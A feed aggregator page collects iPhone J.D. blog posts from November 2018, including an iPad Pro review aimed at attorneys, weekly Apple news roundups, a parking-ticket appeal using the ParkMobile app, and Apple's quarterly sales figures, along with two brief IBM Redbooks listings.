Feed aggregator

Review: iPad Pro 12.9” (third generation) -- the perfect iPad for attorneys

iPhone J.D. - Mon, 11/12/2018 - 01:22

The legal pad dates back to 1888 when Thomas Holley, a paper mill worker, had the idea of binding discarded paper scraps at the mill into inexpensive pads.  In the early 1900s, a Massachusetts judge asked Mr. Holley to add a line 1.25” from the left edge so that the judge had space to annotate his notes, and since that time, the legal pad has been used by countless lawyers.  (For more details, read Old Yeller:  The illustrious history of the yellow legal pad by Suzanne Snider, Legal Affairs, May/June 2005.)

I’ve always thought it obvious that the “pad” in the word “iPad” refers to the legal pad.  After all, the device is sort of like an electronic legal pad, although when the iPad was first introduced in 2010, it was smaller and thicker than a legal pad.  As the screen on the iPad has gotten larger, and as we have gone from an age of third-party styluses which were just so-so to the fantastic first generation Apple Pencil, the iPad has moved closer to a lawyer’s familiar legal pad.  

Apple’s newest iPad Pro, the 12.9” third generation iPad Pro, is the closest that Apple has ever come to an iPad Legal Pad.  The size is almost exactly 8.5” x 11” (letter size), the second generation Apple Pencil is even better than before, and the shape of the device with its flat edges almost feels like a brand new legal pad with crisp edges.  Moreover, the incredibly powerful processor inside combined with the latest iOS and powerful apps makes the latest version of the iPad an incredibly useful tool for lawyers.  Much like the legal pad is an essential tool for any lawyer, the third generation 12.9” iPad Pro is the perfect iPad for many attorneys.  This device is amazing.

The size of a legal pad

One of the reasons that I love using the new iPad Pro is that the screen size remains 12.9” diagonal, just like the first two generations of the iPad Pro, but overall size has reduced.  It’s almost like someone figured out a way to take all of the writing space you get with a legal-size legal pad but shrunk it down to a less awkward size of a letter-sized legal pad. 

Although Apple has reduced the bezels on all sides of the new iPad, and reduced the width a little bit, what you really notice is the decrease in length.  The width only decreased from 8.69” to 8.46” which is not very noticeable.  But on the longer sides, the length decreased from 12.04” to 11.04” and that one-inch reduction is noticeable every time I pick up this device.The depth decreased a little in size from .27” to .23”, and that is nice, but what you really notice is the difference in shape on the edge.  Instead of being curved and tapered on the edges, the edge is now flat, although the corners are rounded so that they don’t hurt your hand.  The end result is that the edge of the new iPad Pro has a feel that reminds me of the iPhone 4 introduced in 2010, although the iPhone 4 depth was larger at 0.37”.

Put it all together, and I love the size and shape of this device.  It feels better to hold, and the weight difference between the first generation iPad Pro and this iPad Pro seems more substantial than it really is.  (The weight decreased from 1.57 pounds to 1.39 pounds.)  Here is a new iPad Pro on top of an old iPad Pro:

Maybe it is something about the flat edge being easier to hold that tricks my mind into thinking that this device is even lighter than it was before.  Indeed, while writing this review I've gone back to my older 12.9" iPad Pro to compare the two, and even though I've been using the new iPad Pro less than a week, the older iPad Pro already feels so much bigger when I hold it.  Apple has gone from a 12.9" iPad Pro which was longer than a letter-size legal pad to a 12.9" iPad Pro which is shorter than a letter-size legal pad because it is now the same size as a letter-size piece of paper.

I worked on a project this past Saturday at a coffee house, using my iPad to do online legal research and to read and annotate cases I downloaded, and then also to draft a memo using a Bluetooth keyboard.  This new size was really nice to use, with a nice big 12.9" diagonal screen in a lighter and easier to hold device.  Don’t get me wrong, I’d prefer for the iPad Pro to be even thinner and lighter, like a legal pad.  And I’m sure that it will head that direction over time, although if it gets much thinner I’m not sure how there will be enough space for a port on the side to plug it in.  But given what is possible with modern technology, I consider this the perfect size for an iPad.

I realize that many folks prefer smaller iPads, and Apple also sells a new 11” iPad Pro, which weighs a half-pound less and is 9.74” x 7.02”.  I played with that model at an Apple Store a few days ago.  It is certainly more compact and lighter when carrying it around, but in my law practice, I am often using my iPad to display documents, and it makes far more sense to me to have something which can show a letter-size document at virtually full size in portrait mode, or in an even larger size in landscape mode. Whether I am writing or editing a document in Microsoft Word, reading an opinion, annotating a brief from my opponent, reviewing exhibits, or reading a transcript, the 12.9” size is fantastic and much better, in my opinion, than a smaller screen.  Carrying around a device which is slightly bigger and heavier is more than worth it for me to have the advantage of the large 12.9” screen.  Even if you previously have been a fan of smaller iPads versus the 12.9” iPad, you owe it to yourself to see if the smaller size of the third generation 12.9” iPad Pro will win you over, even if the first two generations did not. 

As I said in my preview of this new iPad Pro, much like the iPhone X with its edge-to-edge screen seems like the perfect design for the iPhone, the much smaller bezels and reduced size of this new iPad Pro seems like the perfect design for the iPad.  This is the iPad that was always meant to be.  Even if the only new feature of this iPad was the size, that would be enough for me to be a huge fan.

No. 2 Pencil

The second best feature of the new iPad Pro for attorneys is that it works with the new second generation Apple Pencil.  I already loved the tip on the old Apple Pencil, which worked infinitely better than prior third-party styluses thanks to the sharp tip and incredible responsiveness.  But there were a few shortcomings with that first generation Pencil, which led me to wish earlier this year that Apple would open the door to third-party styluses with the same tip, something that Apple did this year for Logitech and its new Crayon stylus, which only works with the 6th generation iPad.

But with the second generation Apple Pencil, Apple has addressed all of the minor complaints I had with the original model.  First, I love that you can now tap the side of the Pencil with your finger to change tools.  For example, last week, I was taking notes in the GoodNotes app while participating in a telephone conference with a judge, and taking notes on my iPad was so much better because if I wanted to change something that I previously wrote, I could just quickly double-tap the side to change to the eraser, erase the word, and then pause a second and GoodNotes automatically switched back to the pen tool.  (Here is more info on how GoodNotes works with the new Apple Pencil.)  Not having to stop what I was doing to find and then tap the eraser tool on the top of the screen may only save about a second or two in actual time, but it made a huge difference in reducing distractions so that my attention remained focused on taking notes of what the judge or the lawyer for the other side was saying.  This one change makes the Pencil vastly more useful for taking notes.  And as app developers come up with additional creative uses for the double-tap (although switching to an eraser is pretty awesome), I’m sure that this feature of the new Pencil will become even better.

One thing to keep in mind:  an app has to be updated to use the double-tap feature with the new Apple Pencil.  For example, GoodNotes works great, but when I double-tap the Pencil in GoodReader, the GoodReader app just ignores that because GoodReader has not been updated (much to my annoyance).

Second, I love that the new Pencil has a flat edge which connects with magnets to the side of the iPad Pro.  It means that I always have a perfect place to put the Pencil when I’m using the iPad but not using the Pencil, and I always know where to reach for the Pencil without hunting around my desk.  I used to keep my Pencil in a shirt pocket using a third-party clip, but that is unnecessary with the second generation Apple Pencil.  When I was doing that online legal research in a coffee shop on Saturday, I kept my Pencil attached to the side as I was searching for cases, and then after I downloaded a case in PDF format, my pencil was in easy reach so it was quick and convenient to highlight key language and add notes in the margins.

Because the Pencil charges while it is attached to the edge, my Pencil always has a sufficient charge.  With my first generation Pencil, if I hadn’t used it in many days, it would sometimes be almost dead when I went to use it.  The new Pencil is similar to the fantastic AirPods; when you take the Pencil from the side of your iPad or you take the AirPods out of their case, they are charged and ready to go.

The magnetic connection works well.  As I walk around my office with the Pencil attached to the side, it is incredibly secure and isn’t going to fall off unless I pull it off.  But when I’m ready to use the Pencil, it comes off easily.  I don’t trust keeping the Pencil attached to the side of the iPad Pro when it is in a briefcase or other bag; it seems like something could knock it off, so instead I just put it in a pencil/pen compartment.  But when the iPad Pro is being used, my Pencil is usually either attached to the side or in my hand.

Third, that flat edge on the new Pencil also feels really good in my hand, and combined with the new matte finish keeps the Pencil more secure in my hand when I am writing.  There is a reason that so many pencils and pens have one or more flat edges.  The new Pencil shape is also a little shorter than the prior Pencil.  For me, both lengths are fine, but some folks might prefer one size over the other.

Fourth, good riddance to the cap on the back of the original Pencil that you had to remove to charge the device (and risk losing), and good riddance to having the Pencil protrude like a flagpole from the edge of the iPad when it charged.  There are no removable parts on the new Pencil, and that is as it should be.

Finally, keep in mind that if your order an Apple Pencil from Apple, you can get it engraved for free.  I didn't do that because I was afraid that it would take to long to do, but I see other folks saying that it didn't add any delay, such as California attorney David Sparks.


The advances that Apple is making with its A-series processors are the best in the business, and for many years have been putting companies like Intel to shame.  Tests show that the new iPad Pro is now faster than all but the fastest laptop computers.

Let’s face it:  for most of the tasks that a lawyer will do with an iPad Pro, that speed is more than you need.  Folks running sophisticated games or working with huge images in a photo editor will get the most use of the new processor, whereas I’m going to notice it less frequently, such as when working with huge PDF files.  But the same can be said for most modern computers; they are capable of speeds that you probably don’t need for most tasks like word processing and reading emails.

But what I do notice whenever I use this new iPad Pro is how incredibly responsive it is.  When I am moving between apps, scrolling through screens, swiping through photos, moving my finger down from the top of the screen to see the notification center, etc., everything is as smooth as silk.  This makes a difference because it means that the interface does what I need when I need it, and doesn’t distract me from the task at hand.  I wrote this 3500+ word review using the new iPad Pro and an external keyboard, and I’ve been scrolling up and down this post as I edit it without even a hint of lag.

Finally, the fast A12X Bionic chip means that this iPad Pro is going to remain fast even as iOS is updated over the years and apps become even more power-hungry.


Apple has removed the Lightning port to replace it with industry-standard USB-C.  For now, I’m reserving judgment because I don’t yet have any USB-C devices to test (other than cables), but I have high hopes for this being a great change.

Right now, Apple is touting USB-C as an improvement over Lightning because it allows for faster data transfer and thus can support external 5K displays.  I’m sure that is true, but that is obviously only going to be useful for a small part of the iPad Pro market.  How many of us have a frequent need to use a 4K or 5K monitor with an iPad?  If that was the only advantage, I cannot believe that Apple would have made the change to USB-C.

I think the real reason that Apple made this change is that it has bigger plans for USB-C in the future.  For example, right now, the iPad cannot access files on an external storage device such as a thumb drive or a small hard drive (absent some workarounds using special apps).  My guess is that Apple will add this feature in the future, make it far easier to transfer large files to and from an iPad Pro and share those files with others.

I also suspect that Apple was keenly aware that USB-C is an industry standard, which vastly increases the potential for third parties to come up with accessories.  Just to take one example, I want the ability to connect via HDMI to a projector, something I do whenever I give a Keynote or PowerPoint presentation from my iPad.  In the past, my only option for doing so was Apple’s own $50 Lightning-to-HDMI connector.  But now, I see that there are tons of HDMI-to-USB-C options on the market.  Do I want something with just HDMI for $17, or something with HDMI and VGA for $33, or something with HDMI and an extra USB-C port (for keeping the iPad charged while also connecting to a monitor) such as this one with HDMI and extra USB-C and a USB port for $40 or maybe this big one with 10 connections including HDMI and VGA and Ethernet and more for $56?   All of those devices are already for sale on Amazon, and they were there before the new iPad Pro was even announced.  Companies are currently working to develop even more options designed especially for the iPad Pro, such as Satechi's upcoming Type-C Mobile Pro Hub (pictured below).  USB-C is going to result in far more accessories that can be used with your iPad.

Note that there are some growing pains associated with any transition.  For example, I prefer to back up my iPad to the Mac at my house rather than iCloud, and as I was driving home from work the day that my new iPad Pro arrived, I realized that I had no way to connect the new iPad Pro to my Mac to restore from a backup of the old iPad Pro it was replacing.  I needed a USB-to-USB-C cable, which I didn’t own.  Fortunately, there is an office supply store on the way home and they had tons of those cables for under $10 (because many Android phones use USB-C) so it was cheap and easy to pick one up, but I’m glad that I realized that before I got home.  Similarly, I’ve long had a Lightning cord on my desk in my office which I have used to charge both my iPhone and iPad.  With this new iPad Pro, I now need two cables on my desk:  Lightning for the iPhone and USB-C for the iPad Pro.

As Apple updates iOS to better support USB-C, and as third party companies come out with even more products, I suspect that it won’t be long before USB-C becomes one of the best features for power users of the new iPad Pro.  Perhaps the only downside will be that there will be so many options out there that it will be tough to choose the best ones.

And the rest...

The size/shape, Pencil support, and speed are the main reasons that I have loved using this new iPad Pro since I first received mine last week, but there are lots of other nice features which will be nice but less important for most attorneys.  I listed the other new features in my preview of the new iPad Pro so look there for all of the details, but just to pick one of them, I really like the screen.  The Liquid Retina display is beautiful with vibrant colors, and it has the same ProMotion and TrueTone features that I discussed in my review of the second generation iPad Pro.  The screen on a regular iPad looks just fine, so I find it hard to believe that someone who is not a graphics professional, such as a lawyer, would choose a new iPad Pro just because of the display.  Nevertheless, it is a nice bonus to have this beautiful display along with all of the other more important new features. 


I’m not sure what Thomas Holley would think of the new iPad Pro.  Perhaps he would fear that it would put the company that he founded out of business.  That would have been a valid concern.  He founded American Pad & Paper in 1888 to sell legal pads, and the company eventually changed its name to Ampad and became one of the largest sellers of legal pads and thousands of other office products.  But about 20 years ago, the company was delisted from the New York Stock Exchange and went bankrupt, and what remains of the company is now owned by TOPS Products.  

But as for that judge who asked Mr. Holley to add the line on the left side so that he could annotate documents — I bet you that judge would love the new iPad Pro.  When I am working in my office, this new iPad Pro is a fantastic companion for my computer.  For example, I can review and annotate briefs and exhibits on the iPad while I am writing an appellate brief on my computer based on that brief/exhibit.  When I walk out of my office to go work elsewhere, I can just grab my iPad Pro (and sometimes also grab my external keyboard) and I have everything that I need for a meeting with other attorneys or clients.  The iPad Pro is powerful enough to do most of what I do on a computer, plus it is far better than a computer for so many other tasks like reading and annotating documents, so it often is all that I need.  And then when I return to the computer at my office or at home, I can pick right up with the work that is best done on a computer, with the iPad at my side.  This is all stuff that I’ve been doing for years with an iPad, and it all works better with the new iPad Pro.  Thanks to the iPad Pro. I have almost no need for paper or for legal pads.

For any attorney only planning to use an iPad occasionally, the 6th generation iPad introduced earlier this year might be sufficient for your needs and it is much cheaper.  But whenever you are next in the market for a new iPad (or your first iPad), if you want to have the best iPad experience and are willing to pay over $1,000 for an iPad and accessories that will significantly aid your law practice, this is the perfect iPad to get.  The new 12.9” iPad Pro with its larger screen is a great size and shape, it works with the amazing second generation Apple Pencil, and it is so fast and powerful that the iPad will let you do all that you want to do.  No prior iPad has ever deserved the word “pad” in its name as much as this one.

Categories: iPhone Web Sites

IBM FlashSystem 9100 Product Guide

IBM Redbooks Site - Fri, 11/09/2018 - 08:30
Draft Redpaper, last updated: Fri, 9 Nov 2018

This IBM Redbooks® Product Guide describes IBM FlashSystem® 9100, which is a comprehensive all-flash, NVMe enabled, enterprise storage solution that delivers the full capabilities of IBM FlashCore® technology.

Categories: Technology

In the news

iPhone J.D. - Fri, 11/09/2018 - 00:55

The third-generation iPad Pro is now available, and most of the news of note this week relates to this new product.  I received mine on Wednesday, and this is a remarkable device.  I want to use it a little more before I write a review, but so far it is amazing.  And now, here is that news of note from the past week:

  • If you are starting to plan your CLE hours for 2019, ABA TECHSHOW will take place in Chicago February 27 to March 2, 2019 at the Hyatt Regency Chicago, and registration is now open.  I plan to be there.
  • Attorney Nilay Patel reviews the new iPad Pro for The Verge.  Although he states that "Apple once again produced mobile hardware that puts the rest of the industry to shame when it comes to performance, battery life, and design," he doesn't like that the iPad Pro cannot replace a computer.  I think that misses the point — the iPad Pro is perfect for the tasks that are best suited for a tablet, whereas a computer is best suited for the tasks that are best suited for a computer, even though there are areas of overlap.
  • Raymond Wong of Mashable wrote an excellent review of the new iPad Pro.
  • John Gruber of Daring Fireball also wrote an excellent review of the new iPad Pro.
  • Matthew Panzarino of TechCrunch also wrote an excellent review of the new iPad Pro.
  • In an article for Macworld, Jason Snell discusses the extensive use of magnets in Apple's products, such as in the new iPad Pro.  Like Jason, I very much remember the old days of computing in which magnets were a big problem around computers, especially if one got close to a floppy disk.
  • Charlie Sorrel of Cult of Mac shows that there are enough magnets on the back of the new iPad Pro to stick it to a refrigerator.  I cannot emphasize enough that THIS IS A BAD IDEA but it is sort of funny.
  • In an interview with David Phelan of The Independent, Apple's Jony Ive discusses the design of the new iPad Pro.
  • Joe Rossignol of MacRumors reveals three lesser-known things about the second-generation Apple Pencil, including a description of the way that it updates its firmware.  And apparently there is already a released firmware update.
  • Samuel Axon of Ars Technica interviewed Apple's Anand Shimpi and Phil Schiller to discuss the incredibly fast processor in the new iPad Pro.
  • Benjamin Mayo of 9to5Mac wrote a useful article on some of the accessories that can connect to the USB-C port on the new iPad Pro.
  • Christine McKee of AppleInsider reports that the top selling item at Best Buy in October was Apple's AirPods.
  • And finally, Twelvesouth introduced an interesting new product this week called PowerPic.  It looks like a normal picture frame, and you can place any 5x7 photo behind the glass.  But if you set your iPhone in the frame, the built-in Qi charger will charge your iPhone.  It's an interesting way to put an iPhone charger in a room without it looking like an iPhone charger.  It costs $79.99 on Amazon.  Here is a 20-second video which shows how it works:

Categories: iPhone Web Sites

Best Practices Guide for Databases on IBM FlashSystem

IBM Redbooks Site - Thu, 11/08/2018 - 08:30
Draft Redpaper, last updated: Thu, 8 Nov 2018

Best Practices Guide for Databases on IBM FlashSystem

Categories: Technology

Challenging a parking ticket with the ParkMobile app

iPhone J.D. - Tue, 11/06/2018 - 22:44

I fought the law, and my app won.  Here is my story.

For many years now, there have been systems in place in many cities allowing you to pay for a parking spot using an iPhone app.  I live in New Orleans, and the system that we use here is called ParkMobile, which operates in 350 cities in the United States.  It is convenient that you can pay for a parking spot before you even leave your car, it is helpful to see how much time you have on the meter even when you are far away from your car, and perhaps best of all, you can add more time to the parking meter no matter where you are.  There have been multiple times when I have been in a deposition or a meeting which ran long and I was able to quickly add more time to the meter without having to go all the way back to my car.  The system works so well that it has almost seemed too easy, making me wonder if simply using the app really would protect me from getting a parking ticket.

On September 25, 2018, I met my wife for lunch at a great restaurant called The Rum House on Magazine Street (a street with tons of fantastic restaurants and shops) and I parked between Seventh and Eighth Streets, right in front of a place called Sucré — which, by the way, makes amazing chocolates, macarons, and other sweets which are available for mail order.  I used the ParkMobile app to pay for parking for 46 minutes ($1.55 plus a $0.35 transaction fee), knowing that if I needed more time than that I could add it from the restaurant.  When lunch was over, it was raining, but I got back to my car with about three minutes left on my parking.  I jumped in the car, turned on the windshield wipers, and then saw underneath a wiper an orange parking ticket envelope with a ticket inside.  Ugh!


I opened up the ParkMobile app, and I saw that I still had about a minute left before my parking would expire.  So I took a screenshot, just in case that might help down the road.

In retrospect, what I wish I had also done was get out of the car and take a picture of my car and the surroundings to show where I was parked (even though I would have gotten pretty wet doing so in the rain), but at the time I didn't realize that would become relevant.  I did, however, take a screenshot of the part of the ParkMobile app that shows that I paid to park in that zone during that time period.  (The black box is where I redacted my vehicle license for this post.)


After I returned to my office, I took a closer look at the ticket and I figured out what happened.  The ticket was issued at 12:50 p.m., which was during my parking time of 12:22 to 1:08 p.m., so that wasn't the problem.  However, the officer who issued me the ticket apparently checked to see whether I had paid using the ParkMobile app, but by mistake thought that I was parked in 2900 block of Magazine, which is parking zone 29216.  In fact, I was actually on the 3000 block of Magazine Street, which is zone 29217. 

New Orleans has a system which allows you to contest a ticket online rather than show up in court.  I had never used the system before, but it was pretty easy to use.  You just fill out a form, explain what happened, and upload any exhibits you want to submit.  I sent the above screenshot pictures, and I also took a screenshot of a part of the ParkMobile website further confirming that I paid.  Unfortunately, I didn't have proof that I was parked in the 3000 block — again, I wish I had taken a picture — but I figured that even if the judge didn't believe me on where I parked, it might help if the judge could see that I had indeed paid to park during the time period that I got the ticket.

After I contested my ticket online, I received an email saying that I would get a decision within five weeks.

Almost exactly five weeks later, I received a letter in the mail saying that I was successful in contesting the ticket.  The decision states:  "Citizen's written statement and citizen's and City's Park Mobile Meter Program information outweighed the prima facie case."

It's always satisfying to get a favorable decision for one of my clients, especially when a lot of money is at stake.  Here, the amount in controversy was only a $30 parking ticket, but it still felt pretty darn good to win.

If you ever get a parking ticket after you have used a parking app, perhaps you will remember my tremendous victory using evidence from the ParkMobile app and you will do some of the same things that I did.  But if you can, also try to take a picture of where your car was located.

Categories: iPhone Web Sites

Apple 2018 fiscal fourth quarter -- the iPhone and iPad angle

iPhone J.D. - Sat, 11/03/2018 - 23:56

Late Thursday, Apple released the results for its 2018 fiscal fourth quarter (which ran from July 1, 2018 to September 29, 2018) and held a call with analysts to discuss the results.  I've been reporting on these quarterly calls for 10 years because even though the calls are aimed at financial analysts, the Apple executives would sometimes reveal something interesting about the iPhone and iPad, and also because Apple would reveal how many iPhones and iPads were sold in the last quarter.  However, that is now about to change.  Although Apple revealed iPhone and iPad sales numbers for last quarter, Apple announced that starting with the fiscal 2019 first quarter (which we are in now), Apple will no longer reveal iPhone and iPad unit sales.  I cannot say that I'm surprised; none of Apple's competitors release similar numbers, and while I am not a securities lawyer, I think that as a public company all that Apple is required to reveal is certain financial information such as profits.  Even so, it has been interesting to look at the data on iPhone and iPads sales over the last decade.

Apple's fiscal fourth quarter is typically a transitional quarter; it is Apple's fiscal first quarter which contains all of the holiday sales, so that is by far Apple's best quarter every year.  Even so, Apple announced that quarterly revenue for the past quarter was $62.9 billion, which is the best fiscal fourth quarter in Apple history.  $10 billion of that was revenue on services, and that is also an all-time high for Apple.  If you want to get all of the nitty gritty details, you can download the audio from the announcement conference call from iTunes, or you can read a transcript of the call prepared by Seeking Alpha, or a transcript prepared by Jason Snell of Six Colors.  Apple's official press release is here.  Here are the items that stood out to me.


  • During the past quarter, Apple sold 46.9 million iPhones, just slightly more than the 46.7 million iPhones sold in Apple 2017 fiscal fourth quarter. The all-time record for iPhone sales in a fiscal Q3 was in 2015, when Apple sold 48 million iPhones.
  • While the increase in the number of iPhones sold versus 2017 Q3 was modest, the increase in revenue from iPhone sales was more impressive thanks to sales of the iPhone X and the first few weeks of sales of the iPhone XS and iPhone XS Max.  iPhone revenue was $28.8 billion in 2017 Q4, and it rose to $37.2 billion in 2018 Q4, a 29% increase.  Considering that unit sales did not go up very much, that demonstrates that people are now buying more expensive iPhones.
  • By my count, Apple has sold 1.468 billion iPhones since they first went on sale in 2007.  And because Apple will no longer report these numbers every quarter, this is the last time I'll be able to report a precise number of all-time iPhone sales.



  • Apple sold 9.7 million iPads in the fiscal third quarter.  That's not as impressive as many other recent quarters, but the introduction of the new iPad Pro last week may start to change that.
  • By my count, Apple has sold almost 425 million iPads since they first went on sale in 2010.
  • If you add all of the iPhone and iPad sales over time, it comes to about 1.892 billion devices sold.  If you add in all of the sales of the iPod touch over time, another device that runs iOS, Tim Cook announced last week that Apple has sold over 2 billion devices that run iOS.


  • Tim Cook announced that Apple Pay use has tripled since this time last year.
  • Cook also noted that Consumer Reports named Apple Pay Cash the highest-rates mobile peer-to-peer service, based on exceptional payment authentication and data privacy.
  • Cook said that it was a record quarter for revenue from wearable products, including the Apple Watch, AirPods and Beats headphones.
  • Apple now has about 500 Apple Stores, and almost half of those are outside of the United States.
  • Cook noted that healthcare is an area in which Apple has a lot of interest.  "You can see from our past several years that we have intense interest in the space and are adding products and services — not monetized services, so far — to that, and I don’t want to talk about the future, it’s because I don’t want to give away what we’re doing. But this is an area of major interest to us."
Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 11/02/2018 - 01:51

When I was younger, taking a photograph meant using film in a camera.  You only had so many pictures on a roll, and you had to pay to develop every picture (even the bad ones), so you were more circumspect about pressing that shutter button.  Nowadays, you can take virtually unlimited pictures for free with your iPhone.  That's great, but it also means that you end up with tons of pictures, only some of which are worth keeping.  This week, California attorney David Sparks of MacSparky reviews BestPhotos, an iPhone app that helps you to pick out the photos on your iPhone that are worth keeping.  The app even gives you options to quickly delete obvious errors.  For example, the app can quickly find all of the videos on your iPhone that last about one second because those are videos that you likely took by accident when you intended to take a photo but instead you were in video mode.  Just tap the mistakes and then tap one button to delete them all.  You can also quickly add missing location information to a bunch of photos at one time, view photos side-by-side to quickly select the one worth keeping, view all of the metadata associated with a picture, and much more.  I was thrilled to learn about the BestPhotos app (developer website) from David Sparks and I quickly paid the $3 to unlock all of the features.  And now, the news of note from the past week:

  • Illinois attorney John Voorhees of MacStories writes about some of the interesting details of Apple's October 30th announcements that you may have missed.
  • California attorney Jeffrey Allen recommends iPhone apps for road warriors in an article for the ABA GPSolo Magazine.
  • I've written before (1, 2) about how border patrol agents will sometimes demand the right to search your iPhone as you come into the United States, and if you decline to unlock your iPhone and let them do so, they may seize the device.  Two months ago this happened to an American Muslim woman, and she retained an attorney with the Council on American-Islamic Relations to represent her in a lawsuit against the government.  Cyrus Farivar of Ars Technica reported this week that the case settled and that the government returned her iPhone.
  • It sounds like a scene from a techno horror movie — a bunch of Apple Watches in a hospital shut down, and then a bunch of iPhones shut down, but other cellphones and electronic devices continue to work just fine.  What in the world could cause that?  Kyle Wiens of iFixIt reports that it turns out that there was a helium leak from an MRI machine which impacted the clocks on Apple devices, and when the clock stops working, the rest of the device cannot work so it shuts down.  It's an interesting story.
  • If you use the Microsoft Outlook app on your iPhone, Michael Potuck of 9to5Mac reports that a new update provides better support for the larger screens on an iPhone XS Max and and iPhone XR.
  • Jeremy Burge of Emojipedia shows off all of the new emoji and emoji changes introduced in iOS 12.1, which came out earlier this week.  He counts 158 new emojis.
  • In January of 2017, Apple introduced a new power management feature for the iPhone 7 and earlier models to help to prevent a device from unexpectedly shutting down when the battery in the device gets old.  Joe Rossignol of MacRumors reports that iOS 12.1 adds this feature to the iPhone 8 and iPhone X.
  • Rossignol also reports that initial tests show that the new iPad Pro is as fast as a new MacBook Pro.  Wow.
  • Charlie Sorrel of Cult of Mac discusses the USB-C port on the new iPad Pro.
  • M.G. Siegler reviews the Apple Watch Series 4 in a post on Medium.  He believes that this is the first truly great Apple Watch, and I agree.
  • Brent Dirks of AppAdvice reviews Name Skillz, a $5 app which helps you to remember peoples' names.
  • And finally, Apple released two videos this week which show off the new features in the iPad Pro.  A one minute video called Change focuses on what is different, like the larger screen.  The more informative one is a three-minute introduction video, and that is the one I have embedded below:

Categories: iPhone Web Sites

Why lawyers will love the new iPad Pro (2018 editions: 12.9" 3rd Generation and 11")

iPhone J.D. - Wed, 10/31/2018 - 02:14

Yesterday, Apple held an event in Brooklyn, NY to unveil the new 2018 version of the iPad Pro.  The iPad Pro was already incredibly useful for attorneys, and this new version is a major upgrade.  Apple has essentially taken everything that was good about the iPhone X / XS / XR and applied it to the iPad, and then on top of that greatly improved the Apple Pencil.  This looks to be a fantastic new device, and I ordered one immediately.

More screen, less bezel

The iPhone X with its edge-to-edge screen and no home button was an obvious design change from all prior iPhones, and the same can be said about the new iPad Pro.  For the first time ever on an iPad, Apple has removed the home button and Touch ID and replaced it with Face ID, and then greatly reduced the size of the bezel around the iPad.  As a result, the new iPad Pro looks like it is essentially all screen.  When introducing the new iPad Pro, here is what Apple VP of Engineering John Ternus said:  "It marks the biggest change since the original iPad, and we have made it better in every possible way.  In fact, this really is the iPad we dreamed about building from the very beginning.  We've always felt that the iPad should be all about the display.  And in this new iPad Pro, we have an LCD which stretches from edge to edge and top to bottom."  He could have just as easily been talking about the iPhone X being what Apple always wanted the iPhone to be.

Apple was very smart in making this change because the approach taken was different for the two iPad Pro sizes. Let's start with the smaller model.  The original iPad Pro came out in 2015 and it was 12.9".  In 2016, Apple introduced a smaller 9.7" with the familiar 9.4" x 6.67" size.  In 2017, Apple took the original 9.7" iPad Pro and made the bezels smaller (but kept the Home Button) to produce a 10.5" iPad Pro which had a larger screen but approximately the same overall size as the prior iPad Pro:  9.8" x 6.8".  This year, Apple has again kept the overall dimensions about the same (9.7" x 7") but reduced the bezels further and removed the Home Button, resulting in a new 11" diagonal screen.  Apple made the right choice here.  People have loved this size of iPad ever since the first iPad came out in 2010, but now there is more screen to use in essentially the same overall size.

For the larger model, Apple knows that folks love that larger screen.  You can look at letter-sized documents essentially full-size when you are in portrait mode, and whether I am annotating briefs, reviewing exhibits, or even just surfing the web, the larger 12.9" screen helps me to be incredibly productive in my law practice.  But the 12.9" iPad Pro has always been large and somewhat cumbersome.  After using one since 2015 I've gotten used to it, but I always wished that there was some way to get that fantastic, larger screen in a smaller device..  And that's exactly what Apple has done.  Apple has kept the screen size at 12.9", but reduced the bezels around it.  As a result, unlike the prior versions of the 12.9" iPad Pro which were around 12" x 8.9", the new 12.9" iPad pro is about 11" x 8.5".  In other words, unlike prior models where the screen size was about the size as a letter-sized sheet of paper, now the entire iPad is about the same size as a letter-sized sheet of paper.  Moreover, the depth decreases from .27" to .23" and Apple also rounded off the corners.  Overall, Apple says that the 2018 version of the 12.9" iPad Pro is 25% less volume than its predecessor, an incredibly impressive change.

Because there is no button on the new iPad Pro, you use the same gestures you use on an iPhone X, such as a swipe up to return to the home screen, and a swipe along the bottom to switch between apps.

If the only new feature of this iPad Pro had been this change in size, that would have been enough for me to be incredibly excited. Having the same large screen to get all of my work done in a device which is smaller and easier to carry around from office to office within my firm, and to court, is going to be fantastic.  I cannot wait to start using it when mine is delivered next week.

No. 2 Pencil

I've been using an Apple Pencil with my iPad Pro since 2015, and I use the Pencil almost every day.  When I am reviewing a brief from an opponent, I use the Pencil to circle arguments and scribble my responses in the margins.  When I am reviewing caselaw I downloaded from Westlaw or Lexis, I use my Pencil to highlight key passages and write the key holding on the first page of the case.  When I am reviewing an exhibit, I highlight and markup key parts.  I use the GoodNotes app to take handwritten notes in meetings and in court and to draft oral arguments.  The iPad Pro is an incredibly useful device, and the Apple Pencil brings it to the next level.

As much as I have loved the Pencil, I have yearned for new features.  Apple has now added all of the features I had been wishing for in the second generation Apple pencil.

Tap to change tools.  What I thought that I wanted was a button on the side of the Pencil that I could press to switch modes, such as between a pencil and an eraser.  But Apple had an even better idea, adding the ability to change modes by tapping on the side of the pencil, much like you can tap on an AirPod play/pause music or launch Siri.  It looks like app developers get to determine how this feature works.  In Apple's Notes app, you have a choice for a double-tap to switch between the pencil and eraser feature, or between the current tool and the previous tool, or bring up the color palette.  In Photoshop for iPad (coming out in 2019), you can choose to double-tap to switch between being zoomed in and zooming out to see the entire image.  This is going to be incredibly useful.

Indeed, it seems that a creative app designer could use this part of the Pencil even for an app that doesn't involve drawing.  Could a photography app take a picture every time you tap the Pencil, using it as a remote control?  Could a book-reader app use this to turn the page?  I'm not yet sure if Apple will allow this, but there seem to be a lot of possibilities. 

Attach to the side to charge.  For the original Apple Pencil, you would remove a cap and then put it in the Lightning port to charge, resulting in this awkward looking long stick coming out of the side of the iPad.  For the second generation Apple Pencil, the device attaches to the long side of the iPad using magnets and charges which it is attached.  This solves numerous problems.  First, it reduces the awkwardness.  Second, it eliminates the chance of using losing that cap while it is charging; there is no longer a cap, it is just a seamless design.  Third, the Pencil attaches to the side of the iPad because there is now a flat side to the Pencil — which I hope means that it solves the problem of the Pencil rolling off of a desk.  Fourth, you now always have a place to store your Pencil.  Just attach it to the iPad.

Since 2015, I have been using a cheap Fisher Chrome Clip to solve two of those problems:  give me a place to store the Pencil (in my shirt pocket) and stop the Pencil from rolling on a desk.  My hope is that with the second generation Pencil, I can retire that clip.

One other thing I like about this new design is that we now have a proper place to store the Pencil — on the side of the iPad — and the Pencil is constantly charged while it is there.  This means that whenever I pick up the Pencil, it is likely to have a full charge.  This reminds me of the AirPods; I store them in a case which charges them, so when I remove them they are likely to have a 100% charge.

